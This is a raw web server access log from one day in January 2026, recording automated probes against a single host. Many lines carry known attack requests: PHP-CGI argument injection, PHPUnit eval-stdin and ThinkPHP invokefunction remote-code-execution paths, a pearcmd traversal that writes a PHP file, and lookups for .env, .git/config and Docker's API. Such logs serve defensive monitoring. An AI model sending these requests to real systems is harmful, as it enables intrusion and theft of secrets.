[Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:11:23:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:11:25:42 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:11:28:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.159.143.190] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[19/Jan/2026:11:45:30 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:12:09:24 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:12:10:30 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 162.243.56.10] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[19/Jan/2026:12:10:30 +0000] 404 - GET http 91.82.83.208 "/.git/config" [Client 162.243.56.10] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[19/Jan/2026:12:19:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.182.231.125] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:12:19:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.182.231.125] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:12:19:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 147.182.231.125] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[19/Jan/2026:12:19:25 +0000] 404 - GET http 91.82.83.208 "/form.html" [Client 147.182.231.125] [Length 122] [Gzip 1.35] "curl/8.1.2" "-" +[19/Jan/2026:12:19:25 +0000] 404 - GET http 91.82.83.208 "/upl.php" [Client 147.182.231.125] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[19/Jan/2026:12:19:26 +0000] 404 - GET http 91.82.83.208 "/t4" [Client 147.182.231.125] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[19/Jan/2026:12:19:26 +0000] 404 - GET http 91.82.83.208 "/geoip/" [Client 147.182.231.125] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[19/Jan/2026:12:19:27 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Jan/2026:12:19:27 +0000] 404 - GET http 91.82.83.208 "/1.php" [Client 147.182.231.125] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[19/Jan/2026:12:19:28 +0000] 404 - GET http 91.82.83.208 "/systembc/password.php" [Client 147.182.231.125] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[19/Jan/2026:12:19:28 +0000] 404 - GET http 91.82.83.208 "/password.php" [Client 147.182.231.125] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[19/Jan/2026:12:24:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:12:33:45 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:12:42:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 185.242.226.80] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[19/Jan/2026:12:49:50 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 182.137.118.27] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:12:49:54 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 182.137.118.27] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:12:49:58 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:49:59 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 182.137.118.27] [Length 154] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:00 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:02 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:03 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:04 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:06 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:08 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:09 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:13 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:14 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:16 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:19 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:20 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:22 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:24 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:26 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:27 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:30 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:32 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:35 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:38 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:42 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:43 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:45 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:47 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:49 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:52 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:53 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:56 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:58 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:50:59 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:51:01 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:51:03 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:51:07 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:51:08 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:51:10 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:51:13 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:51:15 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:51:17 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:51:19 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:51:21 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:51:22 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:51:24 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 182.137.118.27] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:12:54:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:13:01:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:13:13:12 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[19/Jan/2026:13:22:29 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:13:25:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:13:27:01 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 154.81.14.204] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:13:27:02 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 154.81.14.204] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:13:27:04 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 154.81.14.204] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:13:41:25 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[19/Jan/2026:13:42:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 91.109.152.75] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[19/Jan/2026:13:42:19 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 89.42.231.184] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:13:42:19 +0000] 400 - GET http localhost-nginx-proxy-manager "-" [Client 89.42.231.184] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:13:55:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:14:01:10 +0000] 405 - POST http 91.82.83.208 "/" [Client 95.214.55.246] [Length 154] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1" "-" +[19/Jan/2026:14:01:10 +0000] 404 - POST http 91.82.83.208 "/_next" [Client 95.214.55.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0" "-" +[19/Jan/2026:14:01:10 +0000] 404 - POST http 91.82.83.208 "/api" [Client 95.214.55.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[19/Jan/2026:14:01:10 +0000] 404 - POST http 91.82.83.208 "/_next/server" [Client 95.214.55.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[19/Jan/2026:14:01:10 +0000] 404 - POST http 91.82.83.208 "/app" [Client 95.214.55.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36" "-" +[19/Jan/2026:14:01:10 +0000] 404 - POST http 91.82.83.208 "/api/route" [Client 95.214.55.246] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36" "-" +[19/Jan/2026:14:05:56 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:14:06:25 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:14:06:35 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 45.95.212.153] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:14:06:36 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 45.95.212.153] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:14:06:36 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:36 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 45.95.212.153] [Length 154] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:36 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:37 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:37 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:37 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:38 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:38 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:38 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:38 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:39 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:39 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:40 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:40 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:40 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:40 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:41 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:41 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:41 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:42 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:42 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:42 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:43 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:43 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:43 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:43 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:44 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:44 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:44 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:45 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:45 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:45 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:45 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:46 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:46 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:46 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:46 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:47 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:47 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:47 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 45.95.212.153] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:14:06:47 +0000] 404 - GET http 91.82.83.208 